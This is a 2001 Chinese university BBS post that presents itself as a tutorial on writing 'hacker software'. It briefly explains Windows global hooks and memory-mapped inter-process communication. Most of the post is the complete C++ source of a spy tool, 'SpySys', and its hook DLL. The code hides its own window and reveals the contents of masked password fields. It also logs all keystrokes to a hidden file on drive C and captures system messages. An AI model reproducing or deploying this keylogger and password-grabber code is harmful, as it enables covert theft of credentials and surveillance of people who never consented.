荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: Deny (要好好学习了!), 信区: Program
标 题: 系统编程阶进
发信站: 荔园晨风BBS站 (Sun Jun 24 16:56:21 2001), 转信
在一些黑客软件编写中,要求编写者对系统机制和特性有一定深度的了解,
下面就针对这些机制在某些黑客软件中的应用讲述下实现过程,并给出了
一个实列。
系统钩子:
如一些黑客程序,获取*号密码,记录键盘获取密码等,首先都要用
SetWindowsHook
Ex函数,且最后一个参数为0,安装全局HOOK。钩住相应消息,需要在HOOK的
CALLBACK函数中
完成功能,然后系统自动将包含“钩子CALLBACK函数”的DLL映射到受钩子函数影
响的所有进程的
地址空间中,即将这个DLL注入了那些进程。HOOK可以看做是扩充中断驱动程序,
HOOK可以有多个CALLBACK函数构成一个钩子函数链。系统的各种消息首先被送到各
种HOOK函数,再HOOK函数中根据各自的功能对消息进行监视、和控制。
进程通讯:
众所周知,在WIN32下当一个进程被创建时,系统为他分配4GB的私有地址空间
其他进程无法用到其中数据,但有些时候又需要共享数据来完成特定工作,由此
引出了进程通讯的概念。WIN32下给出了一些进程通讯的方法,如COM,DDE,剪贴
版
邮槽等。在本地无论何种方法最终都将被转为以内存映射文件形式实现。因为此方
法
相对来说最底层也就最高效,尤其在大量文件I/O方面更能体现出其优越性。
下面给出俺写的SpySys程序的完整实列演示一下实现方法,其中包括了DLL编程,
Tary编程, 拦截WIN消息,HOOK编程,内存映射,进程通讯编程。实现的功能有,
显示带"****"号的隐藏密码,记
录键盘获取密码,捕获系统消息,这个程序还包含了很多常用技巧,对于刚入道的
朋友,读懂了这个程序会在很大程度上提高你WIN下编程水平,和对系统机制的了
解。
//----------------------------------------------------------------------
-----
#include <vcl.h>
#pragma hdrstop
USERES("passok.res");
USEFORM("onpass.cpp", Form1);
USEFORM("About.cpp", Form2);
//----------------------------------------------------------------------
-----
WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
{
try
{
//利用互斥,防止多个程序运行
HANDLE hMutex=CreateMutex(NULL,TRUE,"GetSys_Run");
if(hMutex==NULL||GetLastError() == ERROR_ALREADY_EXISTS)
{
ShowMessage("程序已经运行");
CloseHandle(hMutex);
return FALSE;
}
Application->Initialize();
//隐藏主窗体
ShowWindow(Application->Handle,SW_HIDE);
Application->ShowMainForm=false;
Application->CreateForm(__classid(TForm1), &Form1);
Application->CreateForm(__classid(TForm2), &Form2);
Application->Run();
}
catch (Exception &exception)
{
Application->ShowException(&exception);
}
return 0;
}
//----------------------------------------------------------------------
-----
//----------------------------------------------------------------------
-----
#ifndef onpassH
#define onpassH
//----------------------------------------------------------------------
-----
#include <Classes.hpp>
#include <Controls.hpp>
#include <StdCtrls.hpp>
#include <Forms.hpp>
#include <ExtCtrls.hpp>
#include <Menus.hpp>
#include <Buttons.hpp>
//缓冲区大小
#define PASSWORD_SIZE 255
//托盘消息
#define MYWM_NOTIFY (WM_APP+100)
//进程通讯消息
#define WM_PASSDATA (WM_USER+100)
//----------------------------------------------------------------------
-----
class TForm1 : public TForm
{
__published: // IDE-managed Components
TPopupMenu *PopupMenu1;
TMenuItem *N1;
TMenuItem *N2;
TMenuItem *N3;
TMenuItem *N4;
TImage *Image1;
TLabel *Label2;
TMenuItem *N5;
TMenuItem *N6;
TEdit *Edit1;
TLabel *Label3;
void __fastcall N1Click(TObject *Sender);
void __fastcall N2Click(TObject *Sender);
void __fastcall N3Click(TObject *Sender);
void __fastcall FormCreate(TObject *Sender);
void __fastcall FormDestroy(TObject *Sender);
void __fastcall N4Click(TObject *Sender);
void __fastcall Button1Click(TObject *Sender);
private: // User declarations
//处理托盘函数定义
void __fastcall TForm1::AddTrayIcon();
void __fastcall TForm1::RemoveTrayIcon();
void __fastcall TForm1::OnDispPassWord(TMessage &Message);
//处理进程通讯函数
void __fastcall TForm1::OnPassData(TMessage &Message);
//定义安装 ,卸栽钩子函数指针
BOOL (WINAPI *install_hook)(HWND hWnd);
BOOL (WINAPI *uninstall_hook)();
HANDLE hFileMap;
LPVOID pMem;
public: // User declarations
__fastcall TForm1(TComponent* Owner);
//托盘,进程通讯消息映射
BEGIN_MESSAGE_MAP
MESSAGE_HANDLER(MYWM_NOTIFY,TMessage,OnDispPassWord)
MESSAGE_HANDLER(WM_PASSDATA,TMessage,OnPassData)
END_MESSAGE_MAP(TForm)
};
//----------------------------------------------------------------------
-----
extern PACKAGE TForm1 *Form1;
//----------------------------------------------------------------------
-----
#endif
//----------------------------------------------------------------
// 系统捕获器
//
// 作者:贾佳
// jiasys@21cn.com
//----------------------------------------------------------------
#include <vcl.h>
#include <ShellApi.hpp>
#pragma hdrstop
#include "onpass.h"
#include "About.h"
//----------------------------------------------------------------------
-----
#pragma package(smart_init)
#pragma resource "*.dfm"
TForm1 *Form1;
//----------------------------------------------------------------------
-----
__fastcall TForm1::TForm1(TComponent* Owner)
: TForm(Owner)
{
}
//----------------------------------------------------------------------
-----
// SetToolWindow
//
// 设置当前窗体属性,不在任务栏出现
//----------------------------------------------------------------------
-----
void SetToolWindow(HANDLE hWin)
{
DWORD dwStyle;
dwStyle=GetWindowLong(hWin,GWL_EXSTYLE);
dwStyle|=WS_EX_TOOLWINDOW;
SetWindowLong(Application->Handle,GWL_EXSTYLE,dwStyle);
}
//----------------------------------------------------------------------
-----
// AddTrayIcon
//
// 添加系统托盘
//----------------------------------------------------------------------
-----
void __fastcall TForm1::AddTrayIcon()
{
NOTIFYICONDATA icon;
icon.cbSize=sizeof(NOTIFYICONDATA);
icon.hWnd=Handle;
icon.uID=200;
strncpy(icon.szTip,"系统捕获器",sizeof(icon.szTip));
icon.hIcon=Application->Icon->Handle;
icon.uCallbackMessage=MYWM_NOTIFY;
icon.uFlags=NIF_MESSAGE|NIF_ICON|NIF_TIP;
Shell_NotifyIcon(NIM_ADD,&icon);
}
//----------------------------------------------------------------------
-----
// AddTrayIcon
//
// 删除系统托盘
//----------------------------------------------------------------------
-----
void __fastcall TForm1::RemoveTrayIcon()
{
NOTIFYICONDATA icon;
icon.cbSize=sizeof(NOTIFYICONDATA);
icon.uID=200;
icon.hWnd=Handle;
Shell_NotifyIcon(NIM_DELETE,&icon);
}
//----------------------------------------------------------------------
-----
// OnDispPassWord
//
// 相应系统托盘消息,显示菜单
//----------------------------------------------------------------------
-----
void __fastcall TForm1::OnDispPassWord(TMessage &Message)
{
POINT p;
switch(Message.LParam)
{
//鼠标右键单击
case WM_RBUTTONUP:
Form2->Hide();
//获取坐标
GetCursorPos(&p);
//当前位置显示菜单
PopupMenu1->PopupComponent=Form1;
SetForegroundWindow(Handle);
PopupMenu1->Popup(p.x,p.y);
break;
//鼠标左键双击
case WM_LBUTTONDBLCLK:
//设置窗体
SetToolWindow(Handle);
Form2->Show();
break;
}
TForm::Dispatch(&Message);
}
//----------------------------------------------------------------------
-----
// OnPassData
//
// 读取内存映射文件,并显示
//----------------------------------------------------------------------
-----
void __fastcall TForm1::OnPassData(TMessage &Message)
{
//打开文件
hFileMap=CreateFileMapping((HANDLE)0xFFFFFFFF,NULL,PAGE_READWRITE,0,
PASSWORD_SI
ZE,"Share_Memory_JiaJia");
if(hFileMap==NULL)
{
CloseHandle(hFileMap);
ShowMessage("打开内存映射文件错误");
}
//读取
pMem=MapViewOfFile(hFileMap,FILE_MAP_READ|FILE_MAP_WRITE,0,0,0);
if(pMem==NULL)
{
CloseHandle(hFileMap);
UnmapViewOfFile(pMem);
ShowMessage("读取存映射文件错误");
}
//显示
Edit1->Text=(LPCTSTR)pMem;
UnmapViewOfFile(pMem);
CloseHandle(hFileMap);
TForm::Dispatch(&Message);
}
//----------------------------------------------------------------------
-----
// N1Click
//
// 调用pass.dll安装全局钩子
//----------------------------------------------------------------------
-----
void __fastcall TForm1::N1Click(TObject *Sender)
{
//动态调用
HINSTANCE DLLinst=LoadLibrary("pass.dll");
if(DLLinst)
{
//获取函数地址
install_hook=(BOOL(WINAPI *)(HWND hWnd))
GetProcAddress(DLLinst,"install_hook");
if(install_hook)
{
//传句并
install_hook(this->Handle);
N1->Checked=true;
N1->Enabled=false;
N2->Checked=false;
Label2->Caption="系统捕获器\n正在运行...";
Image1->Picture->Icon->Handle=Application->Icon->Handle;
Show();
}
else
{
ShowMessage("安装钩子失败");
FreeLibrary(DLLinst);
}
}
else ShowMessage("调用pass.dll失败");
}
//----------------------------------------------------------------------
-----
// N2Click
//
// 卸栽全局钩子
//----------------------------------------------------------------------
-----
void __fastcall TForm1::N2Click(TObject *Sender)
{
HINSTANCE DLLinst=LoadLibrary("pass.dll");
if(DLLinst)
{
uninstall_hook=(BOOL(WINAPI *)())
GetProcAddress(DLLinst,"uninstall_hook");
if(uninstall_hook)
{
uninstall_hook();
Hide();
Edit1->Text="";
N2->Checked=true;
N1->Checked=false;
N1->Enabled=true;
FreeLibrary(DLLinst);
}
else ShowMessage("卸载钩子失败");
}
else ShowMessage("调用pass.dll失败");
}
//----------------------------------------------------------------------
-----
void __fastcall TForm1::N3Click(TObject *Sender)
{
//终止程序
Application->Terminate();
}
//----------------------------------------------------------------------
-----
// FormCreate
//
// 判断pass.dll是否存在
//----------------------------------------------------------------------
-----
void __fastcall TForm1::FormCreate(TObject *Sender)
{
HINSTANCE DLLinst=LoadLibrary("pass.dll");
if(DLLinst)
{
FreeLibrary(DLLinst);
AddTrayIcon();
}
else
{
ShowMessage("pass.dll无法载入,请确认是否再同一目录内!");
Application->Terminate();
}
}
//----------------------------------------------------------------------
-----
void __fastcall TForm1::FormDestroy(TObject *Sender)
{
RemoveTrayIcon();
}
//----------------------------------------------------------------------
-----
void __fastcall TForm1::N4Click(TObject *Sender)
{
SetToolWindow(Handle);
Form2->Show();
}
//----------------------------------------------------------------------
-----
void __fastcall TForm1::Button1Click(TObject *Sender)
{
Hide();
}
//----------------------------------------------------------------------
-----
Pass.dll 文件
//----------------------------------------------------------------
// 系统捕获器
//
// 作者:贾佳
// jiasys@21cn.com
//----------------------------------------------------------------
#include <windows.h>
#include <stdio.h>
#pragma hdrstop
#include <condefs.h>
#define WM_PASSDATA (WM_USER+100) //自定义消息
#define PASSWORD_SIZE 255 //缓冲区大小
HINSTANCE hinstance=NULL;
HHOOK hookmouse=NULL;
HHOOK hookkeyb=NULL;
HHOOK hookmsg=NULL;
HHOOK hookcwnd=NULL;
HWND hWnd_display=NULL;
HWND hWin_Main=NULL;
DWORD dwStyle=NULL;
TCHAR passbuff[PASSWORD_SIZE];
HANDLE hFileMap;
LPVOID pMem;
//定义系统钩子中所用的各回调函数
LRESULT CALLBACK MouseProc(int nCode,WPARAM wParam,LPARAM lParam);
LRESULT CALLBACK KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam);
LRESULT CALLBACK MessageProc(int nCode,WPARAM wParam,LPARAM lParam);
LRESULT CALLBACK CallWndProc(int nCode,WPARAM wParam,LPARAM lParam);
//以标准C方式声明DLL中函数
extern "C" __declspec(dllexport) BOOL WINAPI install_hook(HWND hWnd);
extern "C" __declspec(dllexport) BOOL WINAPI uninstall_hook(void);
BOOL WINAPI HookProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM
lParam);
//----------------------------------------------------------------
// MemMap
//
// 进程通讯,通过内存映射文件实现
//----------------------------------------------------------------
void MemMap(HWND hWnd,LPTSTR membuff)
{
//建立名为 Share_Memory_JiaJia 的内存映射文件
hFileMap=CreateFileMapping((HANDLE)0xFFFFFFFF,NULL,PAGE_READWRITE,0,
PASSWORD_SI
ZE,"Share_Memory_JiaJia");
if(hFileMap==NULL)
{
CloseHandle(hFileMap);
MessageBox(hWnd,"创建内存映射文件错误","错误",MB_OK);
}
//提交文件
pMem=MapViewOfFile(hFileMap,FILE_MAP_READ|FILE_MAP_WRITE,0,0,0);
if(pMem==NULL)
{
CloseHandle(hFileMap);
UnmapViewOfFile(pMem);
MessageBox(hWnd,"写内存映射文件错误","错误",MB_OK);
}
//复制内容
CopyMemory(pMem,membuff,PASSWORD_SIZE);
//删除文件
UnmapViewOfFile(pMem);
}
//----------------------------------------------------------------
// SpyMsg
//
// 调用MemMap建立文件
// 象调用进程发送自定义消息,以便读取内容
//----------------------------------------------------------------
void SpyMsg(LPTSTR szBuff)
{
MemMap(hWnd_display,szBuff);
hWin_Main=FindWindow("TForm1","系统捕获器");
if(hWin_Main)
SendMessage(hWin_Main,WM_PASSDATA,0,0);
}
//----------------------------------------------------------------
// DllEntryPoint
//
// 赋值hinstance
//----------------------------------------------------------------
int WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void*)
{
switch(reason)
{
case DLL_PROCESS_ATTACH:
hinstance=hinst;
break;
}
return 1;
}
//----------------------------------------------------------------
// install_hook
//
// 安装各钩子
//----------------------------------------------------------------
BOOL WINAPI install_hook(HWND hWnd)
{
hWnd_display=hWnd;
hookmouse=SetWindowsHookEx(WH_MOUSE,(HOOKPROC)MouseProc,hinstance,0);
hookkeyb=SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KeyboardProc,hinstance,
0);
hookmsg=SetWindowsHookEx(WH_GETMESSAGE,(HOOKPROC)MessageProc,hinstance,
0);
hookcwnd=SetWindowsHookEx(WH_CALLWNDPROC,(HOOKPROC)CallWndProc,
hinstance,0);
if((hookmouse!=NULL)&&(hookkeyb!=NULL)&&(hookmsg!=NULL)&&(hookcwnd!=NULL
))
return TRUE;
else return FALSE;
}
//----------------------------------------------------------------
// uninstall_hook
//
// 卸栽各钩子
//----------------------------------------------------------------
BOOL WINAPI uninstall_hook(void)
{
bool result=false;
if(hookmouse)
result=UnhookWindowsHookEx(hookmouse);
if(hookkeyb)
result=UnhookWindowsHookEx(hookkeyb);
if(hookmsg)
result=UnhookWindowsHookEx(hookmsg);
if(hookcwnd)
result=UnhookWindowsHookEx(hookcwnd);
return result;
}
//----------------------------------------------------------------
// MouseProc
//
// 拦截鼠标双击,移动
//----------------------------------------------------------------
LRESULT CALLBACK MouseProc(int nCode,WPARAM wParam,LPARAM lParam)
{
MOUSEHOOKSTRUCT *pmouse=(MOUSEHOOKSTRUCT * FAR)lParam;
switch(wParam)
{
//双击消息
case WM_LBUTTONDBLCLK:
//取得当前句并
hWnd_display=WindowFromPoint(pmouse->pt);
//判断是否为密码属性
dwStyle=GetWindowLong(hWnd_display,GWL_STYLE);
if((dwStyle & ES_PASSWORD)==ES_PASSWORD)
{
//利用WM_GETTEXT得到密码内容
SendMessage(hWnd_display,WM_GETTEXT,(WPARAM)PASSWORD_SIZE,(LPAR
AM)passbuff);
//显示内容
SpyMsg(passbuff);
}
break;
case WM_MOUSEMOVE:
/*
//获取当前坐标
sprintf(passbuff,"%d,%d",pmouse->pt.x,pmouse->pt.y);
SpyMsg(passbuff);
*/
break;
}
return CallNextHookEx(hookmouse,nCode,wParam,lParam);
}
//----------------------------------------------------------------
// KeyboardProc
//
// 捕获按键并写入文件,
// 此函数没有判断回车或其他,功能键
//----------------------------------------------------------------
LRESULT CALLBACK KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam)
{
HANDLE hFile;
//写入字节
DWORD dwBytesWrite=1;
DWORD IsPreviousKeyDown;
// DWORD IsKeyUp;
IsPreviousKeyDown=(lParam&0x40000000)>>30;//30
// IsKeyUp=(lParam&0x80000000)>>31;//31
// char CR=0x0D,LF=0x0A;
TCHAR lpStr;
//按下按钮
if(IsPreviousKeyDown)
{
//建立文件
hFile=CreateFile("C:\\passdata.txt",GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_
WRITE, NULL, OPEN_ALWAYS,
FILE_ATTRIBUTE_HIDDEN, NULL);
//文件尾部
SetFilePointer(hFile,0,NULL,FILE_END);
//取键值
lpStr=(TCHAR)(wParam);
//写文件
WriteFile(hFile,&lpStr,1,&dwBytesWrite,0);
//关闭
CloseHandle(hFile);
}
return CallNextHookEx(hookkeyb,nCode,wParam,lParam );
}
//----------------------------------------------------------------
// MessageProc
//
// 拦截消息,HookProc处理
//----------------------------------------------------------------
LRESULT CALLBACK MessageProc(int nCode,WPARAM wParam,LPARAM lParam)
{
MSG *msg=(MSG *)lParam;
if(nCode>=0&&msg&&msg->hwnd)
{
HookProc(msg->hwnd,msg->message,msg->wParam,msg->lParam);
}
return CallNextHookEx(hookmsg,nCode,wParam,lParam);
}
//----------------------------------------------------------------
// CallWndProc
//
// 拦截消息,HookProc处理
//----------------------------------------------------------------
LRESULT CALLBACK CallWndProc(int nCode,WPARAM wParam,LPARAM lParam)
{
CWPSTRUCT *pcw=(CWPSTRUCT *)lParam;
if(nCode>=0&&pcw&&pcw->hwnd)
{
HookProc(pcw->hwnd,pcw->message,pcw->wParam,pcw->lParam);
}
return CallNextHookEx(hookcwnd,nCode,wParam,lParam);
}
//----------------------------------------------------------------
// HookProc
//
// 捕获指定消息
//----------------------------------------------------------------
BOOL WINAPI HookProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
if(message&&IsWindow(hWnd))
{
switch(message)
{
case WM_QUIT:
SpyMsg("捕获退出消息");
break;
case WM_CREATE:
SpyMsg("捕获窗体建立消息");
break;
case WM_DESTROY:
SpyMsg("捕获窗体退出消息");
break;
case WM_COPY:
SpyMsg("捕获复制消息");
break;
case WM_PASTE:
SpyMsg("捕获粘贴消息");
break;
case WM_CUT:
SpyMsg("捕获剪贴消息");
break;
case WM_CLEAR:
SpyMsg("捕获清除消息");
break;
case WM_SYSCOMMAND:
switch(wParam)
{
case SC_MINIMIZE:
SpyMsg("捕获最小化消息");
break;
case SC_MAXIMIZE:
SpyMsg("捕获最大化消息");
break;
case SC_RESTORE:
SpyMsg("捕获恢复窗体消息");
break;
}
break;
}
}
return TRUE;
}
--
所 为
为了大家的偷电事业,跳闸后请不要吵精诚所致,金石为开 为了我们的偷电事业,请不要?
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.1.247]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店